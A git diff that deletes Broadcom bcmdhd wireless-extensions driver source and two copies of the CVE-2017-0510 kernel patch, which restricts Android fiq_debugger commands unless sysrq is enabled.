ETHER_ADDR_LEN); -- wireless_send_event(dev, cmd, &wrqu, extra); -- pmkidcand++; -- count--; -- } -- break; -- } --#endif /* WIRELESS_EXT > 17 */ -- -- case WLC_E_SCAN_COMPLETE: --#if WIRELESS_EXT > 14 -- cmd = SIOCGIWSCAN; --#endif 
-- WL_TRACE(("event WLC_E_SCAN_COMPLETE\n")); -- if ((g_iscan) && (g_iscan->sysioc_pid >= 0) && -- (g_iscan->iscan_state != ISCAN_STATE_IDLE)) -- up(&g_iscan->sysioc_sem); -- break; -- -- default: -- /* Cannot translate event */ -- break; -- } -- -- if (cmd) { -- if (cmd == SIOCGIWSCAN) -- wireless_send_event(dev, cmd, &wrqu, NULL); -- else -- wireless_send_event(dev, cmd, &wrqu, extra); -- } -- --#if WIRELESS_EXT > 14 -- /* Look for WLC events that indicate a connection failure. -- * If found, generate an IWEVCUSTOM event. -- */ -- memset(extra, 0, sizeof(extra)); -- if (wl_iw_check_conn_fail(e, extra, sizeof(extra))) { -- cmd = IWEVCUSTOM; -- wrqu.data.length = strlen(extra); -- wireless_send_event(dev, cmd, &wrqu, extra); -- } --#endif /* WIRELESS_EXT > 14 */ -- --#endif /* WIRELESS_EXT > 13 */ --} -- --int wl_iw_get_wireless_stats(struct net_device *dev, struct iw_statistics *wstats) --{ -- int res = 0; -- wl_cnt_t cnt; -- int phy_noise; -- int rssi; -- scb_val_t scb_val; -- -- phy_noise = 0; -- if ((res = dev_wlc_ioctl(dev, WLC_GET_PHY_NOISE, &phy_noise, sizeof(phy_noise)))) -- goto done; -- -- phy_noise = dtoh32(phy_noise); -- WL_TRACE(("wl_iw_get_wireless_stats phy noise=%d\n *****", phy_noise)); -- -- scb_val.val = 0; -- if ((res = dev_wlc_ioctl(dev, WLC_GET_RSSI, &scb_val, sizeof(scb_val_t)))) -- goto done; -- -- rssi = dtoh32(scb_val.val); -- WL_TRACE(("wl_iw_get_wireless_stats rssi=%d ****** \n", rssi)); -- if (rssi <= WL_IW_RSSI_NO_SIGNAL) -- wstats->qual.qual = 0; -- else if (rssi <= WL_IW_RSSI_VERY_LOW) -- wstats->qual.qual = 1; -- else if (rssi <= WL_IW_RSSI_LOW) -- wstats->qual.qual = 2; -- else if (rssi <= WL_IW_RSSI_GOOD) -- wstats->qual.qual = 3; -- else if (rssi <= WL_IW_RSSI_VERY_GOOD) -- wstats->qual.qual = 4; -- else -- wstats->qual.qual = 5; -- -- /* Wraps to 0 if RSSI is 0 */ -- wstats->qual.level = 0x100 + rssi; -- wstats->qual.noise = 0x100 + phy_noise; --#if WIRELESS_EXT > 18 -- wstats->qual.updated |= (IW_QUAL_ALL_UPDATED | 
IW_QUAL_DBM); --#else -- wstats->qual.updated |= 7; --#endif /* WIRELESS_EXT > 18 */ -- --#if WIRELESS_EXT > 11 -- WL_TRACE(("wl_iw_get_wireless_stats counters=%d\n *****", (int)sizeof(wl_cnt_t))); -- -- memset(&cnt, 0, sizeof(wl_cnt_t)); -- res = dev_wlc_bufvar_get(dev, "counters", (char *)&cnt, sizeof(wl_cnt_t)); -- if (res) -- { -- WL_ERROR(("wl_iw_get_wireless_stats counters failed error=%d ****** \n", res)); -- goto done; -- } -- -- cnt.version = dtoh16(cnt.version); -- if (cnt.version != WL_CNT_T_VERSION) { -- WL_TRACE(("\tIncorrect version of counters struct: expected %d; got %d\n", -- WL_CNT_T_VERSION, cnt.version)); -- goto done; -- } -- -- wstats->discard.nwid = 0; -- wstats->discard.code = dtoh32(cnt.rxundec); -- wstats->discard.fragment = dtoh32(cnt.rxfragerr); -- wstats->discard.retries = dtoh32(cnt.txfail); -- wstats->discard.misc = dtoh32(cnt.rxrunt) + dtoh32(cnt.rxgiant); -- wstats->miss.beacon = 0; -- -- WL_TRACE(("wl_iw_get_wireless_stats counters txframe=%d txbyte=%d\n", -- dtoh32(cnt.txframe), dtoh32(cnt.txbyte))); -- WL_TRACE(("wl_iw_get_wireless_stats counters rxfrmtoolong=%d\n", dtoh32(cnt.rxfrmtoolong))); -- WL_TRACE(("wl_iw_get_wireless_stats counters rxbadplcp=%d\n", dtoh32(cnt.rxbadplcp))); -- WL_TRACE(("wl_iw_get_wireless_stats counters rxundec=%d\n", dtoh32(cnt.rxundec))); -- WL_TRACE(("wl_iw_get_wireless_stats counters rxfragerr=%d\n", dtoh32(cnt.rxfragerr))); -- WL_TRACE(("wl_iw_get_wireless_stats counters txfail=%d\n", dtoh32(cnt.txfail))); -- WL_TRACE(("wl_iw_get_wireless_stats counters rxrunt=%d\n", dtoh32(cnt.rxrunt))); -- WL_TRACE(("wl_iw_get_wireless_stats counters rxgiant=%d\n", dtoh32(cnt.rxgiant))); -- --#endif /* WIRELESS_EXT > 11 */ -- --done: -- return res; --} -- --static void --wl_iw_timerfunc(ulong data) --{ -- iscan_info_t *iscan = (iscan_info_t *)data; -- iscan->timer_on = 0; -- if (iscan->iscan_state != ISCAN_STATE_IDLE) { -- WL_TRACE(("timer trigger\n")); -- up(&iscan->sysioc_sem); -- } --} -- --static void 
--wl_iw_set_event_mask(struct net_device *dev) --{ -- char eventmask[WL_EVENTING_MASK_LEN]; -- char iovbuf[WL_EVENTING_MASK_LEN + 12]; /* Room for "event_msgs" + '\0' + bitvec */ -- -- dev_iw_iovar_getbuf(dev, "event_msgs", "", 0, iovbuf, sizeof(iovbuf)); -- bcopy(iovbuf, eventmask, WL_EVENTING_MASK_LEN); -- setbit(eventmask, WLC_E_SCAN_COMPLETE); -- dev_iw_iovar_setbuf(dev, "event_msgs", eventmask, WL_EVENTING_MASK_LEN, -- iovbuf, sizeof(iovbuf)); -- --} -- --static int --wl_iw_iscan_prep(wl_scan_params_t *params, wlc_ssid_t *ssid) --{ -- int err = 0; -- -- memcpy(¶ms->bssid, ðer_bcast, ETHER_ADDR_LEN); -- params->bss_type = DOT11_BSSTYPE_ANY; -- params->scan_type = 0; -- params->nprobes = -1; -- params->active_time = -1; -- params->passive_time = -1; -- params->home_time = -1; -- params->channel_num = 0; -- -- params->nprobes = htod32(params->nprobes); -- params->active_time = htod32(params->active_time); -- params->passive_time = htod32(params->passive_time); -- params->home_time = htod32(params->home_time); -- if (ssid && ssid->SSID_len) -- memcpy(¶ms->ssid, ssid, sizeof(wlc_ssid_t)); -- -- return err; --} -- --static int --wl_iw_iscan(iscan_info_t *iscan, wlc_ssid_t *ssid, uint16 action) --{ -- int params_size = (WL_SCAN_PARAMS_FIXED_SIZE + OFFSETOF(wl_iscan_params_t, params)); -- wl_iscan_params_t *params; -- int err = 0; -- -- if (ssid && ssid->SSID_len) { -- params_size += sizeof(wlc_ssid_t); -- } -- params = (wl_iscan_params_t*)kmalloc(params_size, GFP_KERNEL); -- if (params == NULL) { -- return -ENOMEM; -- } -- memset(params, 0, params_size); -- DHD_WARN(params_size < WLC_IOCTL_SMLEN, kfree(params);return BCME_ERROR;); -- -- err = wl_iw_iscan_prep(¶ms->params, ssid); -- -- if (!err) { -- params->version = htod32(ISCAN_REQ_VERSION); -- params->action = htod16(action); -- params->scan_duration = htod16(0); -- -- /* params_size += OFFSETOF(wl_iscan_params_t, params); */ -- (void) dev_iw_iovar_setbuf(iscan->dev, "iscan", params, params_size, -- 
iscan->ioctlbuf, WLC_IOCTL_SMLEN); -- } -- -- kfree(params); -- return err; --} -- --static uint32 --wl_iw_iscan_get(iscan_info_t *iscan) --{ -- iscan_buf_t * buf; -- iscan_buf_t * ptr; -- wl_iscan_results_t * list_buf; -- wl_iscan_results_t list; -- wl_scan_results_t *results; -- uint32 status; -- -- /* buffers are allocated on demand */ -- if (iscan->list_cur) { -- buf = iscan->list_cur; -- iscan->list_cur = buf->next; -- } -- else { -- buf = kmalloc(sizeof(iscan_buf_t), GFP_KERNEL); -- if (!buf) -- return WL_SCAN_RESULTS_ABORTED; -- buf->next = NULL; -- if (!iscan->list_hdr) -- iscan->list_hdr = buf; -- else { -- ptr = iscan->list_hdr; -- while (ptr->next) { -- ptr = ptr->next; -- } -- ptr->next = buf; -- } -- } -- memset(buf->iscan_buf, 0, WLC_IW_ISCAN_MAXLEN); -- list_buf = (wl_iscan_results_t*)buf->iscan_buf; -- results = &list_buf->results; -- results->buflen = WL_ISCAN_RESULTS_FIXED_SIZE; -- results->version = 0; -- results->count = 0; -- -- memset(&list, 0, sizeof(list)); -- list.results.buflen = htod32(WLC_IW_ISCAN_MAXLEN); -- (void) dev_iw_iovar_getbuf( -- iscan->dev, -- "iscanresults", -- &list, -- WL_ISCAN_RESULTS_FIXED_SIZE, -- buf->iscan_buf, -- WLC_IW_ISCAN_MAXLEN); -- results->buflen = dtoh32(results->buflen); -- results->version = dtoh32(results->version); -- results->count = dtoh32(results->count); -- WL_TRACE(("results->count = %d\n", results->count)); -- -- WL_TRACE(("results->buflen = %d\n", results->buflen)); -- status = dtoh32(list_buf->status); -- return status; --} -- --static void wl_iw_send_scan_complete(iscan_info_t *iscan) --{ -- union iwreq_data wrqu; -- -- memset(&wrqu, 0, sizeof(wrqu)); -- -- /* wext expects to get no data for SIOCGIWSCAN Event */ -- wireless_send_event(iscan->dev, SIOCGIWSCAN, &wrqu, NULL); --} -- --static int --_iscan_sysioc_thread(void *data) --{ -- uint32 status; -- iscan_info_t *iscan = (iscan_info_t *)data; -- -- DAEMONIZE("iscan_sysioc"); -- -- status = WL_SCAN_RESULTS_PARTIAL; -- while 
(down_interruptible(&iscan->sysioc_sem) == 0) { -- if (iscan->timer_on) { -- del_timer(&iscan->timer); -- iscan->timer_on = 0; -- } -- --#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27)) -- rtnl_lock(); --#endif -- status = wl_iw_iscan_get(iscan); --#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27)) -- rtnl_unlock(); --#endif -- -- switch (status) { -- case WL_SCAN_RESULTS_PARTIAL: -- WL_TRACE(("iscanresults incomplete\n")); --#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27)) -- rtnl_lock(); --#endif -- /* make sure our buffer size is enough before going next round */ -- wl_iw_iscan(iscan, NULL, WL_SCAN_ACTION_CONTINUE); --#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27)) -- rtnl_unlock(); --#endif -- /* Reschedule the timer */ -- iscan->timer.expires = jiffies + msecs_to_jiffies(iscan->timer_ms); -- add_timer(&iscan->timer); -- iscan->timer_on = 1; -- break; -- case WL_SCAN_RESULTS_SUCCESS: -- WL_TRACE(("iscanresults complete\n")); -- iscan->iscan_state = ISCAN_STATE_IDLE; -- wl_iw_send_scan_complete(iscan); -- break; -- case WL_SCAN_RESULTS_PENDING: -- WL_TRACE(("iscanresults pending\n")); -- /* Reschedule the timer */ -- iscan->timer.expires = jiffies + msecs_to_jiffies(iscan->timer_ms); -- add_timer(&iscan->timer); -- iscan->timer_on = 1; -- break; -- case WL_SCAN_RESULTS_ABORTED: -- WL_TRACE(("iscanresults aborted\n")); -- iscan->iscan_state = ISCAN_STATE_IDLE; -- wl_iw_send_scan_complete(iscan); -- break; -- default: -- WL_TRACE(("iscanresults returned unknown status %d\n", status)); -- break; -- } -- } -- complete_and_exit(&iscan->sysioc_exited, 0); --} -- --int --wl_iw_attach(struct net_device *dev, void * dhdp) --{ -- iscan_info_t *iscan = NULL; -- -- if (!dev) -- return 0; -- -- iscan = kmalloc(sizeof(iscan_info_t), GFP_KERNEL); -- if (!iscan) -- return -ENOMEM; -- memset(iscan, 0, sizeof(iscan_info_t)); --#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 7, 0)) -- iscan->kthread = NULL; --#endif -- iscan->sysioc_pid = -1; -- /* we only care about 
main interface so save a global here */ -- g_iscan = iscan; -- iscan->dev = dev; -- iscan->iscan_state = ISCAN_STATE_IDLE; -- -- -- /* Set up the timer */ -- iscan->timer_ms = 2000; -- init_timer(&iscan->timer); -- iscan->timer.data = (ulong)iscan; -- iscan->timer.function = wl_iw_timerfunc; -- -- sema_init(&iscan->sysioc_sem, 0); -- init_completion(&iscan->sysioc_exited); --#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3, 7, 0)) -- iscan->kthread = kthread_run(_iscan_sysioc_thread, iscan, "iscan_sysioc"); -- iscan->sysioc_pid = iscan->kthread->pid; --#else -- iscan->sysioc_pid = kernel_thread(_iscan_sysioc_thread, iscan, 0); --#endif -- if (iscan->sysioc_pid < 0) -- return -ENOMEM; -- return 0; --} -- --void wl_iw_detach(void) --{ -- iscan_buf_t *buf; -- iscan_info_t *iscan = g_iscan; -- if (!iscan) -- return; -- if (iscan->sysioc_pid >= 0) { -- KILL_PROC(iscan->sysioc_pid, SIGTERM); -- wait_for_completion(&iscan->sysioc_exited); -- } -- -- while (iscan->list_hdr) { -- buf = iscan->list_hdr->next; -- kfree(iscan->list_hdr); -- iscan->list_hdr = buf; -- } -- kfree(iscan); -- g_iscan = NULL; --} -- --#endif /* USE_IW */ -diff --git a/drivers/net/wireless/bcmdhd/wl_iw.h b/drivers/net/wireless/bcmdhd/wl_iw.h -deleted file mode 100644 -index 95b2abdbd7c58..0000000000000 ---- a/drivers/net/wireless/bcmdhd/wl_iw.h -+++ /dev/null -@@ -1,161 +0,0 @@ --/* -- * Linux Wireless Extensions support -- * -- * Copyright (C) 1999-2014, Broadcom Corporation -- * -- * Unless you and Broadcom execute a separate written software license -- * agreement governing use of this software, this software is licensed to you -- * under the terms of the GNU General Public License version 2 (the "GPL"), -- * available at http://www.broadcom.com/licenses/GPLv2.php, with the -- * following added to such license: -- * -- * As a special exception, the copyright holders of this software give you -- * permission to link this software with independent modules, and to copy and -- * distribute the resulting 
executable under terms of your choice, provided that -- * you also meet, for each linked independent module, the terms and conditions of -- * the license of that module. An independent module is a module which is not -- * derived from this software. The special exception does not apply to any -- * modifications of the software. -- * -- * Notwithstanding the above, under no circumstances may you combine this -- * software in any way with any other Broadcom software provided under a license -- * other than the GPL, without Broadcom's express prior written consent. -- * -- * $Id: wl_iw.h 467328 2014-04-03 01:23:40Z $ -- */ -- --#ifndef _wl_iw_h_ --#define _wl_iw_h_ -- --#include -- --#include --#include --#include -- --#define WL_SCAN_PARAMS_SSID_MAX 10 --#define GET_SSID "SSID=" --#define GET_CHANNEL "CH=" --#define GET_NPROBE "NPROBE=" --#define GET_ACTIVE_ASSOC_DWELL "ACTIVE=" --#define GET_PASSIVE_ASSOC_DWELL "PASSIVE=" --#define GET_HOME_DWELL "HOME=" --#define GET_SCAN_TYPE "TYPE=" -- --#define BAND_GET_CMD "GETBAND" --#define BAND_SET_CMD "SETBAND" --#define DTIM_SKIP_GET_CMD "DTIMSKIPGET" --#define DTIM_SKIP_SET_CMD "DTIMSKIPSET" --#define SETSUSPEND_CMD "SETSUSPENDOPT" --#define PNOSSIDCLR_SET_CMD "PNOSSIDCLR" --/* Lin - Is the extra space needed? 
*/ --#define PNOSETUP_SET_CMD "PNOSETUP " /* TLV command has extra end space */ --#define PNOENABLE_SET_CMD "PNOFORCE" --#define PNODEBUG_SET_CMD "PNODEBUG" --#define TXPOWER_SET_CMD "TXPOWER" -- --#define MAC2STR(a) (a)[0], (a)[1], (a)[2], (a)[3], (a)[4], (a)[5] --#define MACSTR "%02x:%02x:%02x:%02x:%02x:%02x" -- --/* Structure to keep global parameters */ --typedef struct wl_iw_extra_params { -- int target_channel; /* target channel */ --} wl_iw_extra_params_t; -- --struct cntry_locales_custom { -- char iso_abbrev[WLC_CNTRY_BUF_SZ]; /* ISO 3166-1 country abbreviation */ -- char custom_locale[WLC_CNTRY_BUF_SZ]; /* Custom firmware locale */ -- int32 custom_locale_rev; /* Custom local revisin default -1 */ --}; --/* ============================================== */ --/* Defines from wlc_pub.h */ --#define WL_IW_RSSI_MINVAL -200 /* Low value, e.g. for forcing roam */ --#define WL_IW_RSSI_NO_SIGNAL -91 /* NDIS RSSI link quality cutoffs */ --#define WL_IW_RSSI_VERY_LOW -80 /* Very low quality cutoffs */ --#define WL_IW_RSSI_LOW -70 /* Low quality cutoffs */ --#define WL_IW_RSSI_GOOD -68 /* Good quality cutoffs */ --#define WL_IW_RSSI_VERY_GOOD -58 /* Very good quality cutoffs */ --#define WL_IW_RSSI_EXCELLENT -57 /* Excellent quality cutoffs */ --#define WL_IW_RSSI_INVALID 0 /* invalid RSSI value */ --#define MAX_WX_STRING 80 --#define SSID_FMT_BUF_LEN ((4 * 32) + 1) --#define isprint(c) bcm_isprint(c) --#define WL_IW_SET_ACTIVE_SCAN (SIOCIWFIRSTPRIV+1) --#define WL_IW_GET_RSSI (SIOCIWFIRSTPRIV+3) --#define WL_IW_SET_PASSIVE_SCAN (SIOCIWFIRSTPRIV+5) --#define WL_IW_GET_LINK_SPEED (SIOCIWFIRSTPRIV+7) --#define WL_IW_GET_CURR_MACADDR (SIOCIWFIRSTPRIV+9) --#define WL_IW_SET_STOP (SIOCIWFIRSTPRIV+11) --#define WL_IW_SET_START (SIOCIWFIRSTPRIV+13) -- --#define G_SCAN_RESULTS 8*1024 --#define WE_ADD_EVENT_FIX 0x80 --#define G_WLAN_SET_ON 0 --#define G_WLAN_SET_OFF 1 -- -- --typedef struct wl_iw { -- char nickname[IW_ESSID_MAX_SIZE]; -- -- struct iw_statistics wstats; -- -- 
int spy_num; -- uint32 pwsec; /* pairwise wsec setting */ -- uint32 gwsec; /* group wsec setting */ -- bool privacy_invoked; /* IW_AUTH_PRIVACY_INVOKED setting */ -- struct ether_addr spy_addr[IW_MAX_SPY]; -- struct iw_quality spy_qual[IW_MAX_SPY]; -- void *wlinfo; --} wl_iw_t; -- --struct wl_ctrl { -- struct timer_list *timer; -- struct net_device *dev; -- long sysioc_pid; -- struct semaphore sysioc_sem; -- struct completion sysioc_exited; --}; -- -- --#if WIRELESS_EXT > 12 --#include --extern const struct iw_handler_def wl_iw_handler_def; --#endif /* WIRELESS_EXT > 12 */ -- --extern int wl_iw_ioctl(struct net_device *dev, struct ifreq *rq, int cmd); --extern void wl_iw_event(struct net_device *dev, wl_event_msg_t *e, void* data); --extern int wl_iw_get_wireless_stats(struct net_device *dev, struct iw_statistics *wstats); --int wl_iw_attach(struct net_device *dev, void * dhdp); --int wl_iw_send_priv_event(struct net_device *dev, char *flag); -- --void wl_iw_detach(void); -- --#define CSCAN_COMMAND "CSCAN " --#define CSCAN_TLV_PREFIX 'S' --#define CSCAN_TLV_VERSION 1 --#define CSCAN_TLV_SUBVERSION 0 --#define CSCAN_TLV_TYPE_SSID_IE 'S' --#define CSCAN_TLV_TYPE_CHANNEL_IE 'C' --#define CSCAN_TLV_TYPE_NPROBE_IE 'N' --#define CSCAN_TLV_TYPE_ACTIVE_IE 'A' --#define CSCAN_TLV_TYPE_PASSIVE_IE 'P' --#define CSCAN_TLV_TYPE_HOME_IE 'H' --#define CSCAN_TLV_TYPE_STYPE_IE 'T' -- --#if LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 27) --#define IWE_STREAM_ADD_EVENT(info, stream, ends, iwe, extra) \ -- iwe_stream_add_event(info, stream, ends, iwe, extra) --#define IWE_STREAM_ADD_VALUE(info, event, value, ends, iwe, event_len) \ -- iwe_stream_add_value(info, event, value, ends, iwe, event_len) --#define IWE_STREAM_ADD_POINT(info, stream, ends, iwe, extra) \ -- iwe_stream_add_point(info, stream, ends, iwe, extra) --#else --#define IWE_STREAM_ADD_EVENT(info, stream, ends, iwe, extra) \ -- iwe_stream_add_event(stream, ends, iwe, extra) --#define IWE_STREAM_ADD_VALUE(info, event, value, 
ends, iwe, event_len) \
-- iwe_stream_add_value(event, value, ends, iwe, event_len)
--#define IWE_STREAM_ADD_POINT(info, stream, ends, iwe, extra) \
-- iwe_stream_add_point(stream, ends, iwe, extra)
--#endif
--
--#endif /* _wl_iw_h_ */
diff --git a/Patches/Linux_CVEs/CVE-2017-0510/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-0510/3.10/0002.patch
deleted file mode 100644
index 9ae4f425..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0510/3.10/0002.patch
+++ /dev/null
@@ -1,206 +0,0 @@
-From d4dfd82835bb6f92de3bfb8a1cbf6beaf892ad08 Mon Sep 17 00:00:00 2001
-From: Mark Salyzyn
-Date: Tue, 20 Dec 2016 15:59:19 -0800
-Subject: android: fiq_debugger: restrict access to critical commands.
-
-Sysrq must be enabled via /proc/sys/kernel/sysrq as a security
-measure to enable various critical fiq debugger commands that
-either leak information or can be used as a system attack.
-
-Default disabled, this will leave the reboot, reset, irqs, sleep,
-nosleep, console and ps commands. Reboot and reset commands
-will be restricted from taking any parameters. We will also
-switch to showing the limited command set in this mode.
-
-Signed-off-by: Mark Salyzyn
-Bug: 32402555
-Change-Id: I3f74b1ff5e4971d619bcb37a911fed68fbb538d5
-[d-cagle@codeaurora.org: Resolve merge conflict]
-Git-repo: https://android.googlesource.com/kernel/msm
-Git-commit: 1031836c0895f1f5a05c25efec83bfa11aa08ca9
-Signed-off-by: Dennis Cagle
----
- .../staging/android/fiq_debugger/fiq_debugger.c | 86 ++++++++++++++--------
- drivers/tty/sysrq.c | 3 +-
- include/linux/sysrq.h | 1 +
- 3 files changed, 57 insertions(+), 33 deletions(-)
-
-diff --git a/drivers/staging/android/fiq_debugger/fiq_debugger.c b/drivers/staging/android/fiq_debugger/fiq_debugger.c
-index 7d6b4ae..ceb45bc9e 100644
----- a/drivers/staging/android/fiq_debugger/fiq_debugger.c
-+++ b/drivers/staging/android/fiq_debugger/fiq_debugger.c
-@@ -30,6 +30,7 @@
- #include
- #include
- #include
-+#include
- #include
- #include
- #include
-@@ -395,7 +396,7 @@ static void fiq_debugger_work(struct work_struct *work)
- cmd += 6;
- while (*cmd == ' ')
- cmd++;
-- if (cmd != '\0')
-+ if ((cmd != '\0') && sysrq_on())
- kernel_restart(cmd);
- else
- kernel_restart(NULL);
-@@ -425,29 +426,39 @@ static void fiq_debugger_irq_exec(struct fiq_debugger_state *state, char *cmd)
- static void fiq_debugger_help(struct fiq_debugger_state *state)
- {
- fiq_debugger_printf(&state->output,
-- "FIQ Debugger commands:\n"
-- " pc PC status\n"
-- " regs Register dump\n"
-- " allregs Extended Register dump\n"
-- " bt Stack trace\n"
-- " reboot [] Reboot with command \n"
-- " reset [] Hard reset with command \n"
-- " irqs Interupt status\n"
-- " kmsg Kernel log\n"
-- " version Kernel version\n");
-- fiq_debugger_printf(&state->output,
-- " sleep Allow sleep while in FIQ\n"
-- " nosleep Disable sleep while in FIQ\n"
-- " console Switch terminal to console\n"
-- " cpu Current CPU\n"
-- " cpu Switch to CPU\n");
-+ "FIQ Debugger commands:\n");
-+ if (sysrq_on()) {
-+ fiq_debugger_printf(&state->output,
-+ " pc PC status\n"
-+ " regs Register dump\n"
-+ " allregs Extended Register dump\n"
-+ " bt Stack trace\n");
-+ fiq_debugger_printf(&state->output,
-+ " reboot [] Reboot with command \n"
-+ " reset [] Hard reset with command \n"
-+ " irqs Interrupt status\n"
-+ " kmsg Kernel log\n"
-+ " version Kernel version\n");
-+ fiq_debugger_printf(&state->output,
-+ " cpu Current CPU\n"
-+ " cpu Switch to CPU\n"
-+ " sysrq sysrq options\n"
-+ " sysrq Execute sysrq with \n");
-+ } else {
-+ fiq_debugger_printf(&state->output,
-+ " reboot Reboot\n"
-+ " reset Hard reset\n"
-+ " irqs Interrupt status\n");
-+ }
- fiq_debugger_printf(&state->output,
-- " ps Process list\n"
-- " sysrq sysrq options\n"
-- " sysrq Execute sysrq with \n");
-+ " sleep Allow sleep while in FIQ\n"
-+ " nosleep Disable sleep while in FIQ\n"
-+ " console Switch terminal to console\n"
-+ " ps Process list\n");
- #ifdef CONFIG_KGDB
-- fiq_debugger_printf(&state->output,
-- " kgdb Enter kernel debugger\n");
-+ if (fiq_kgdb_enable) {
-+ fiq_debugger_printf(&state->output,
-+ " kgdb Enter kernel debugger\n");
- #endif
- }
-
-@@ -479,18 +490,23 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- if (!strcmp(cmd, "help") || !strcmp(cmd, "?")) {
- fiq_debugger_help(state);
- } else if (!strcmp(cmd, "pc")) {
-- fiq_debugger_dump_pc(&state->output, regs);
-+ if (sysrq_on())
-+ fiq_debugger_dump_pc(&state->output, regs);
- } else if
(!strcmp(cmd, "regs")) {
-- fiq_debugger_dump_regs(&state->output, regs);
-+ if (sysrq_on())
-+ fiq_debugger_dump_regs(&state->output, regs);
- } else if (!strcmp(cmd, "allregs")) {
-- fiq_debugger_dump_allregs(&state->output, regs);
-+ if (sysrq_on())
-+ fiq_debugger_dump_allregs(&state->output, regs);
- } else if (!strcmp(cmd, "bt")) {
-- fiq_debugger_dump_stacktrace(&state->output, regs, 100, svc_sp);
-+ if (sysrq_on())
-+ fiq_debugger_dump_stacktrace(&state->output, regs,
-+ 100, svc_sp);
- } else if (!strncmp(cmd, "reset", 5)) {
- cmd += 5;
- while (*cmd == ' ')
- cmd++;
-- if (*cmd) {
-+ if (*cmd && sysrq_on()) {
- char tmp_cmd[32];
- strlcpy(tmp_cmd, cmd, sizeof(tmp_cmd));
- machine_restart(tmp_cmd);
-@@ -500,9 +516,12 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- } else if (!strcmp(cmd, "irqs")) {
- fiq_debugger_dump_irqs(state);
- } else if (!strcmp(cmd, "kmsg")) {
-- fiq_debugger_dump_kernel_log(state);
-+ if (sysrq_on())
-+ fiq_debugger_dump_kernel_log(state);
- } else if (!strcmp(cmd, "version")) {
-- fiq_debugger_printf(&state->output, "%s\n", linux_banner);
-+ if (sysrq_on())
-+ fiq_debugger_printf(&state->output, "%s\n",
-+ linux_banner);
- } else if (!strcmp(cmd, "sleep")) {
- state->no_sleep = false;
- fiq_debugger_printf(&state->output, "enabling sleep\n");
-@@ -514,14 +533,17 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- fiq_debugger_uart_flush(state);
- state->console_enable = true;
- } else if (!strcmp(cmd, "cpu")) {
-- fiq_debugger_printf(&state->output, "cpu %d\n", state->current_cpu);
-- } else if (!strncmp(cmd, "cpu ", 4)) {
-+ if (sysrq_on())
-+ fiq_debugger_printf(&state->output, "cpu %d\n",
-+ state->current_cpu);
-+ } else if (!strncmp(cmd, "cpu ", 4) && sysrq_on()) {
- unsigned long cpu = 0;
- if (strict_strtoul(cmd + 4, 10, &cpu) == 0)
- fiq_debugger_switch_cpu(state, cpu);
- else
- fiq_debugger_printf(&state->output, "invalid cpu\n");
-- fiq_debugger_printf(&state->output, "cpu
%d\n", state->current_cpu);
-+ fiq_debugger_printf(&state->output, "cpu %d\n",
-+ state->current_cpu);
- } else {
- if (state->debug_busy) {
- fiq_debugger_printf(&state->output,
-diff --git a/drivers/tty/sysrq.c b/drivers/tty/sysrq.c
-index b51c154..08c9406 100644
----- a/drivers/tty/sysrq.c
-+++ b/drivers/tty/sysrq.c
-@@ -55,10 +55,11 @@ static bool __read_mostly sysrq_always_enabled;
- unsigned short platform_sysrq_reset_seq[] __weak = { KEY_RESERVED };
- int sysrq_reset_downtime_ms __weak;
-
--static bool sysrq_on(void)
-+bool sysrq_on(void)
- {
- return sysrq_enabled || sysrq_always_enabled;
- }
-+EXPORT_SYMBOL(sysrq_on);
-
- /*
- * A value of 1 means 'all', other nonzero values are an op mask:
-diff --git a/include/linux/sysrq.h b/include/linux/sysrq.h
-index 7faf933..5a0bd93 100644
----- a/include/linux/sysrq.h
-+++ b/include/linux/sysrq.h
-@@ -45,6 +45,7 @@ struct sysrq_key_op {
- * are available -- else NULL's).
- */
-
-+bool sysrq_on(void);
- void handle_sysrq(int key);
- void __handle_sysrq(int key, bool check_mask);
- int register_sysrq_key(int key, struct sysrq_key_op *op);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0510/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2017-0510/3.18/0003.patch
deleted file mode 100644
index 423f121c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0510/3.18/0003.patch
+++ /dev/null
@@ -1,206 +0,0 @@
-From 7a4fd6fb0df85d16db29561e0063b41a62f11e4d Mon Sep 17 00:00:00 2001
-From: Mark Salyzyn
-Date: Tue, 20 Dec 2016 15:59:19 -0800
-Subject: android: fiq_debugger: restrict access to critical commands.
-
-Sysrq must be enabled via /proc/sys/kernel/sysrq as a security
-measure to enable various critical fiq debugger commands that
-either leak information or can be used as a system attack.
-
-Default disabled, this will leave the reboot, reset, irqs, sleep,
-nosleep, console and ps commands. Reboot and reset commands
-will be restricted from taking any parameters. We will also
-switch to showing the limited command set in this mode.
-
-Signed-off-by: Mark Salyzyn
-Bug: 32402555
-Change-Id: I3f74b1ff5e4971d619bcb37a911fed68fbb538d5
-[d-cagle@codeaurora.org: Resolve merge conflict]
-Git-repo: https://android.googlesource.com/kernel/msm
-Git-commit: 1031836c0895f1f5a05c25efec83bfa11aa08ca9
-Signed-off-by: Dennis Cagle
----
- .../staging/android/fiq_debugger/fiq_debugger.c | 86 ++++++++++++++--------
- drivers/tty/sysrq.c | 3 +-
- include/linux/sysrq.h | 1 +
- 3 files changed, 57 insertions(+), 33 deletions(-)
-
-diff --git a/drivers/staging/android/fiq_debugger/fiq_debugger.c b/drivers/staging/android/fiq_debugger/fiq_debugger.c
-index 52f6816..0abced1 100644
----- a/drivers/staging/android/fiq_debugger/fiq_debugger.c
-+++ b/drivers/staging/android/fiq_debugger/fiq_debugger.c
-@@ -30,6 +30,7 @@
- #include
- #include
- #include
-+#include
- #include
- #include
- #include
-@@ -395,7 +396,7 @@ static void fiq_debugger_work(struct work_struct *work)
- cmd += 6;
- while (*cmd == ' ')
- cmd++;
-- if (cmd != '\0')
-+ if ((cmd != '\0') && sysrq_on())
- kernel_restart(cmd);
- else
- kernel_restart(NULL);
